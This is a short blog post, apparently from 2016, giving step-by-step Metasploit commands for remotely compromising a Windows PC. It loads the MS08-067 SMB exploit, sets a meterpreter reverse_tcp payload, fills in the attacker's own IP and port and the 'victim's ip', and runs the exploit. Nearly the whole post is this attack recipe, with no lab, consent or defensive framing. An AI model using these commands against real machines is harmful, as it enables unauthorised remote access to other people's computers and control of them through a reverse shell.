Saturday, 9 January 2016

Remote PC Hacking via Kali Linux

Remote PC Hacking via Kali Linux using Metasploit

Open a terminal and type:
 msfconsole

Here are the commands you need to type in:
use windows/smb/ms08_067_netapi
 set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST *Your ip adress* (If you don't know your ip adress then open a new terminal and type:
ifconfig

your ip adress will be somewhere in the output.( exp:inet addr:192.168.101.100

set LPORT 4444

set RHOST *victim's ip*

set RPORT 445

exploit

(Now You should connect)

No comments:

Post a Comment